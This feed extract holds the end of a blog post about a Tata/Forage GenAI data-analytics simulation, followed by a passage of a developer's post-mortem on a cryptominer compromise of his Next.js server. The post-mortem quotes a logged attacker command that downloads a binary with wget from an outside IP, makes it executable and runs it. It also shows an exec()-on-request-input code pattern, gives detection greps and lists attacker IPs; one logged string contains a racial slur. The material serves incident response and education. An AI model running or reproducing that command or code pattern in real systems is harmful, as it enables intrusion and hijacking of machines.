&lt;h2&gt;
  
  
  The Scenario: AI Transformation Consultant
&lt;/h2&gt;

&lt;p&gt;The simulation places you in the role of an &lt;strong&gt;AI transformation consultant&lt;/strong&gt; working with Geldium Finance's collections team. Here's the brief:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Client:&lt;/strong&gt; Geldium Finance&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Problem:&lt;/strong&gt; High delinquency rates, inefficient collections, no AI strategy&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Goal:&lt;/strong&gt; Design a GenAI-powered analytics solution for predicting delinquency risk and building an ethical, scalable collections strategy&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This wasn't just another theoretical exercise. This was about &lt;strong&gt;impact&lt;/strong&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Challenge: Three Interconnected Problems
&lt;/h2&gt;

&lt;p&gt;What I loved about this simulation was that it wasn't compartmentalized. Each task built on the previous one, mirroring how real consulting actually works.&lt;/p&gt;




&lt;h3&gt;
  
  
  Task 1: Exploratory Data Analysis (EDA) with GenAI
&lt;/h3&gt;

&lt;p&gt;The first task dropped a real dataset on my desk: customer financial data with delinquency flags. My job? Conduct an EDA using GenAI tools to assess data quality, identify risk indicators, and structure insights for predictive modeling.&lt;/p&gt;

&lt;p&gt;Instead of spending hours staring at correlation matrices, I used &lt;strong&gt;GenAI as a thinking partner&lt;/strong&gt;—Claude and ChatGPT helped me structure hypotheses, identify outliers, and surface patterns I might have missed. Pure momentum.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The mindset shift:&lt;/strong&gt; GenAI isn't about replacing analysis—it's about &lt;em&gt;amplifying&lt;/em&gt; insight generation at scale.&lt;/p&gt;




&lt;h3&gt;
  
  
  Task 2: Designing a Predictive Modeling Framework
&lt;/h3&gt;

&lt;p&gt;With EDA insights in hand, Task 2 asked me to design an initial &lt;em&gt;no-code&lt;/em&gt; predictive modeling framework to assess customer delinquency risk.&lt;/p&gt;

&lt;p&gt;No-code. That's the kicker. In the traditional ML world, we jump straight to scikit-learn and TensorFlow. But Tata's simulation forced me to think about &lt;strong&gt;business feasibility, scalability, and explainability&lt;/strong&gt; before touching a single line of code.&lt;/p&gt;

&lt;p&gt;I proposed a structured framework that leveraged GenAI to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Define logic for risk scoring without complex algorithms&lt;/li&gt;
&lt;li&gt;Create transparent, auditable decision pathways&lt;/li&gt;
&lt;li&gt;Generate evaluation criteria that align with business goals&lt;/li&gt;
&lt;li&gt;Design for regulatory compliance from day one&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This exercise taught me something crucial: &lt;strong&gt;the best models are often the ones non-technical stakeholders actually understand and trust.&lt;/strong&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Task 3: Architecting an AI-Driven Collections Strategy
&lt;/h3&gt;

&lt;p&gt;The final challenge was the juicy one. Design a comprehensive collections strategy that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Leveraged agentic AI (AI agents that can take autonomous actions)&lt;/li&gt;
&lt;li&gt;Incorporated ethical AI principles and fairness considerations&lt;/li&gt;
&lt;li&gt;Met regulatory compliance requirements&lt;/li&gt;
&lt;li&gt;Scaled across thousands of customers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I spent time thinking about:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;How do you design AI automation that &lt;em&gt;reduces&lt;/em&gt; bias rather than amplifies it?&lt;/li&gt;
&lt;li&gt;What does a scalable implementation framework actually look like?&lt;/li&gt;
&lt;li&gt;How do you balance aggressive collections efforts with customer empathy?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The answer wasn't a 200-page architecture document. It was a &lt;strong&gt;thoughtful, actionable strategy&lt;/strong&gt; that balanced business needs with ethical responsibilities.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why This Challenge Hits Different
&lt;/h2&gt;

&lt;p&gt;Unlike cookie-cutter tutorials, this simulation felt &lt;em&gt;alive&lt;/em&gt;. Here's why:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Real-World Messiness&lt;/strong&gt;&lt;br&gt;
The data wasn't clean. The requirements weren't perfectly aligned. The business constraints were genuinely contradictory at times. This forced me to make trade-offs and justify decisions—just like in actual work.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. GenAI Integration (Not AI Replacement)&lt;/strong&gt;&lt;br&gt;
Rather than asking "how do I build an AI solution?" it asked "how do I use AI &lt;em&gt;tools&lt;/em&gt; to solve a business problem?" That's a fundamentally different question, and way more interesting.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Ethical Complexity&lt;/strong&gt;&lt;br&gt;
Collections is a sensitive business. The simulation didn't shy away from fairness, bias, and regulatory concerns. It forced me to think about &lt;em&gt;impact&lt;/em&gt; beyond accuracy metrics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Progressive Scaffolding&lt;/strong&gt;&lt;br&gt;
Each task built naturally on the previous one. By Task 3, I had context and data to make informed architectural decisions. It didn't feel like disconnected modules—it felt like a real consulting engagement.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Forage's Presentation&lt;/strong&gt;&lt;br&gt;
The simulation was polished, professional, and genuinely engaging. The client emails felt real. The scenarios were plausible. This elevated the whole experience from "training exercise" to "legitimate portfolio piece."&lt;/p&gt;




&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;Here's what I delivered:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Deliverable&lt;/th&gt;
&lt;th&gt;What It Does&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;EDA Summary Report&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Data quality assessment, risk indicator identification, structured insights&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Predictive Modeling Framework&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No-code risk scoring logic with transparent decision pathways&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Collections Strategy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Ethical AI architecture with implementation roadmap and regulatory alignment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Streamlit Application&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Interactive dashboard for EDA and model planning&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h3&gt;
  
  
  Tech Stack
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Python&lt;/strong&gt; + &lt;strong&gt;Pandas&lt;/strong&gt; for data wrangling&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Streamlit&lt;/strong&gt; for the interactive dashboard&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GenAI (Claude/ChatGPT/Grok)&lt;/strong&gt; as thinking partners throughout&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Markdown&lt;/strong&gt; for structured documentation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;👉 &lt;a href="https://github.com/lfariabr/gen-ai-powered-data-analytics" rel="noopener noreferrer"&gt;Open Source Code (GitHub)&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;p&gt;This challenge reinforced critical principles I apply to every project:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Start with the business problem&lt;/strong&gt;: Every model decision should trace back to impact&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GenAI amplifies, doesn't replace&lt;/strong&gt;: Use it as a thinking partner, not a crutch&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Explainability &amp;gt; Complexity&lt;/strong&gt;: The best models are ones stakeholders trust&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ethics aren't optional&lt;/strong&gt;: Fairness and compliance must be baked in from day one&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ship something real&lt;/strong&gt;: I didn't just write reports—I built a working Streamlit app&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;p&gt;Again, if you'd like to give this challenge a shot:&lt;br&gt;&lt;br&gt;
👉 &lt;a href="https://www.theforage.com/simulations/tata/data-analytics-t3zr" rel="noopener noreferrer"&gt;Tata GenAI Data Analytics Simulation&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then come back and tell me:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What surprised you most?&lt;/li&gt;
&lt;li&gt;How did your approach to analysis shift?&lt;/li&gt;
&lt;li&gt;What ethical dilemmas did you wrestle with?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I genuinely want to hear your takes. The beauty of challenges like this is there's no single right answer—just thoughtful problem-solving.&lt;/p&gt;




&lt;h2&gt;
  
  
  Potential Next Steps
&lt;/h2&gt;

&lt;p&gt;The foundation is solid. Here's where this could go:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Enhancement&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Advanced Visualizations&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;More sophisticated Streamlit dashboards&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML Model Implementation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Validate the no-code framework with actual models&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Ethical AI Documentation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Lessons learned in bias mitigation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Prompting Strategies&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Deep dive into GenAI techniques that worked&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;This project stretched me across roles: data analyst, ML strategist, consultant, and engineer. But that's the point—real problems don't come in neat boxes.&lt;/p&gt;

&lt;p&gt;I walked away with a working application, solid documentation, and a sharper perspective on how GenAI fits into enterprise analytics. That's the kind of outcome I bring to every engagement.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Go give it a shot. I'll be watching for your takes in the comments.&lt;/strong&gt; 🚀&lt;/p&gt;

</description>
      <category>genai</category>
      <category>dataanalytics</category>
      <category>machinelearning</category>
      <category>career</category>
    </item>
    <item>
      <title>Security Incident Report: Cryptominer Attack on Next.js Application</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Sat, 13 Dec 2025 04:46:57 +0000</pubDate>
      <link>https://forem.com/lfariaus/security-incident-report-cryptominer-attack-on-nextjs-application-1df4</link>
      <guid>https://forem.com/lfariaus/security-incident-report-cryptominer-attack-on-nextjs-application-1df4</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;On December 7-8, 2025, my Next.js portfolio application &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt; running on a DigitalOcean Ubuntu droplet was compromised by an automated cryptomining attack. The attacker successfully executed remote code on the containerized Next.js application, deploying cryptocurrency miners that ran for several hours before detection.&lt;/p&gt;

&lt;p&gt;This document serves as a post-mortem analysis and educational resource for understanding how the attack occurred, what was compromised, and how to prevent similar incidents.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Timeline:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Attack Started:&lt;/strong&gt; ~December 7, 21:52 UTC&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Detection:&lt;/strong&gt; December 8, ~18:00 UTC (via unusual container behavior)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remediation:&lt;/strong&gt; December 9, 2025 (full rebuild and investigation)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Posting:&lt;/strong&gt; December 10, 2025 (this document)&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Problem Outline
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What Happened
&lt;/h3&gt;

&lt;p&gt;An attacker exploited a vulnerability in my Next.js application to execute arbitrary shell commands within the Docker container. The attack resulted in:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Cryptominer deployment&lt;/strong&gt; - Two mining processes (&lt;code&gt;XXaFNLHK&lt;/code&gt; and &lt;code&gt;runnv&lt;/code&gt;) running for 4+ hours&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Resource exhaustion&lt;/strong&gt; - CPU usage spiked, causing application timeouts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Persistence attempts&lt;/strong&gt; - Malware tried (and failed) to create systemd services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Process spawning&lt;/strong&gt; - 40+ zombie shell processes created to maintain infection&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Initial Symptoms
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Nginx timeouts:&lt;/strong&gt; Multiple &lt;code&gt;upstream timed out (110: Operation timed out)&lt;/code&gt; errors&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Container unresponsiveness:&lt;/strong&gt; All docker commands became extremely slow&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;HTTP 499/504 errors:&lt;/strong&gt; Requests failing or timing out&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;High CPU usage:&lt;/strong&gt; Container consuming excessive resources&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Discovery
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker compose &lt;span class="nb"&gt;exec &lt;/span&gt;webapp ps aux
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Revealed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PID   USER     TIME  COMMAND
1126  nextjs   4h24  ./XXaFNLHK          # Cryptominer #1
1456  nextjs   3h49  /tmp/runnv/runnv    # Cryptominer #2
40+   nextjs   0:00  [sh]                # Zombie shells
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi93x3bpw9gckeorr80z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi93x3bpw9gckeorr80z.png" alt="Terminal Logs from frontend_app container" width="800" height="483"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Findings
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Attack Vector: Remote Code Execution (RCE)
&lt;/h3&gt;

&lt;p&gt;The attacker exploited a vulnerability that allowed execution of shell commands through HTTP requests. The exact entry point was identified through nginx access logs showing suspicious POST requests with URL-encoded shell commands.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Evidence from logs:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;141.98.11.98 - POST /device.rsp?opt=sys&amp;amp;cmd=___S_O_S_T_R_E_A_MAX___&amp;amp;mdb=sos&amp;amp;mdc=cd%20%2Ftmp%3Brm%20jew.arm7%3B%20wget%20http%3A%2F%2F78.142.18.92%2Fbins%2Fjew.arm7%3B%20chmod%20777%20jew.arm7%3B%20.%2Fjew.arm7%20tbk
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Decoded command:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; /tmp&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;rm &lt;/span&gt;jew.arm7&lt;span class="p"&gt;;&lt;/span&gt; wget http://78.142.18.92/bins/jew.arm7&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;chmod &lt;/span&gt;777 jew.arm7&lt;span class="p"&gt;;&lt;/span&gt; ./jew.arm7 tbk
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is a common IoT/router exploit being sprayed at internet-facing servers. The fact that my Next.js application &lt;strong&gt;responded&lt;/strong&gt; to this indicates a code execution vulnerability.&lt;/p&gt;




&lt;h3&gt;
  
  
  2. Malware Analysis
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Downloaded files:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;/tmp/runnv/runnv           &lt;span class="c"&gt;# 8.3MB binary - cryptominer&lt;/span&gt;
/tmp/runnv/config.json     &lt;span class="c"&gt;# Mining pool configuration&lt;/span&gt;
/tmp/alive.service         &lt;span class="c"&gt;# Systemd persistence attempt (failed)&lt;/span&gt;
/tmp/lived.service         &lt;span class="c"&gt;# Systemd persistence attempt (failed)&lt;/span&gt;
./XXaFNLHK                 &lt;span class="c"&gt;# Secondary miner binary&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Attacker infrastructure:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;89.144.31.18&lt;/code&gt; - Download server for initial payload (&lt;code&gt;x86&lt;/code&gt; binary)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;78.142.18.92&lt;/code&gt; - Secondary malware distribution server&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  3. Next.js Application Vulnerability
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Key findings from application logs:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="err"&gt;⨯&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;Error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;NEXT_REDIRECT&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nl"&gt;digest&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;12334&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s1"&gt;my nuts itch nigga&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s1"&gt;MEOWWWWWWWWW&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This custom "digest" value in &lt;code&gt;NEXT_REDIRECT&lt;/code&gt; errors strongly suggests:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An &lt;strong&gt;API route or Server Action&lt;/strong&gt; is executing unsanitized user input&lt;/li&gt;
&lt;li&gt;The attacker is injecting shell commands through HTTP parameters&lt;/li&gt;
&lt;li&gt;Next.js is catching the error but the command has already executed&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Probable vulnerable code pattern:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// VULNERABLE CODE - Example of what might exist&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;POST&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;exec&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;child_process&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="c1"&gt;// 🚨 DANGEROUS - executes arbitrary commands&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;Response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;success&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  4. Attack Pattern
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Reconnaissance:&lt;/strong&gt; Automated bots scan for vulnerable servers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exploitation:&lt;/strong&gt; Send crafted HTTP requests with shell commands&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Payload delivery:&lt;/strong&gt; Download cryptominer binaries from attacker's server&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Execution:&lt;/strong&gt; Run miners using victim's CPU resources&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Persistence:&lt;/strong&gt; Attempt to create startup services (blocked by Docker permissions)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Obfuscation:&lt;/strong&gt; Spawn multiple shell processes to avoid detection&lt;/li&gt;
&lt;/ol&gt;




&lt;h3&gt;
  
  
  5. Why Docker Sandboxing Helped
&lt;/h3&gt;

&lt;p&gt;The attack was &lt;strong&gt;partially contained&lt;/strong&gt; due to Docker security:&lt;/p&gt;

&lt;p&gt;✅ &lt;strong&gt;What Docker prevented:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Miners &lt;strong&gt;couldn't&lt;/strong&gt; write to &lt;code&gt;/dev/&lt;/code&gt; (Permission denied)&lt;/li&gt;
&lt;li&gt;Systemd services &lt;strong&gt;couldn't&lt;/strong&gt; be installed (no systemd in container)&lt;/li&gt;
&lt;li&gt;Limited filesystem access&lt;/li&gt;
&lt;li&gt;Isolated from host system&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;❌ &lt;strong&gt;What Docker didn't prevent:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Code execution within container&lt;/li&gt;
&lt;li&gt;CPU resource consumption&lt;/li&gt;
&lt;li&gt;Network connections to mining pools&lt;/li&gt;
&lt;li&gt;Writing to &lt;code&gt;/tmp/&lt;/code&gt; directory&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Solution
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Immediate Actions Taken
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Stop the compromised container&lt;/span&gt;
docker compose down

&lt;span class="c"&gt;# 2. Preserve forensic evidence&lt;/span&gt;
docker logs frontend_app &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; ~/attack_logs.txt
docker logs nginx_gateway &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; ~/nginx_logs.txt

&lt;span class="c"&gt;# 3. Full rebuild from clean source&lt;/span&gt;
&lt;span class="nb"&gt;cd&lt;/span&gt; /var/www/portfolio
git pull origin master &lt;span class="nt"&gt;--ff-only&lt;/span&gt;
docker compose build &lt;span class="nt"&gt;--no-cache&lt;/span&gt;
docker compose up &lt;span class="nt"&gt;-d&lt;/span&gt;

&lt;span class="c"&gt;# 4. Verify clean state&lt;/span&gt;
docker compose ps
docker compose &lt;span class="nb"&gt;exec &lt;/span&gt;webapp ps aux  &lt;span class="c"&gt;# Check for suspicious processes&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Required Code Review
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Action items:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;✅ Audit all API routes for &lt;code&gt;exec()&lt;/code&gt;, &lt;code&gt;spawn()&lt;/code&gt;, &lt;code&gt;eval()&lt;/code&gt;, or &lt;code&gt;Function()&lt;/code&gt; calls&lt;/li&gt;
&lt;li&gt;✅ Review Server Actions for input validation&lt;/li&gt;
&lt;li&gt;✅ Check dependencies for known vulnerabilities: &lt;code&gt;npm audit&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;✅ Update Next.js to latest version (was on 15.3.2)&lt;/li&gt;
&lt;li&gt;✅ Implement input sanitization on all user-facing endpoints&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Search for vulnerable patterns:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find dangerous functions in codebase&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s2"&gt;"exec&lt;/span&gt;&lt;span class="se"&gt;\|&lt;/span&gt;&lt;span class="s2"&gt;spawn&lt;/span&gt;&lt;span class="se"&gt;\|&lt;/span&gt;&lt;span class="s2"&gt;eval&lt;/span&gt;&lt;span class="se"&gt;\|&lt;/span&gt;&lt;span class="s2"&gt;Function("&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.js"&lt;/span&gt; &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.ts"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--exclude-dir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;node_modules

&lt;span class="c"&gt;# Check for unsanitized Server Actions&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s2"&gt;"use server"&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.js"&lt;/span&gt; &lt;span class="nt"&gt;--include&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"*.ts"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  Security Hardening Implementation Plan
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. &lt;strong&gt;Docker Security&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
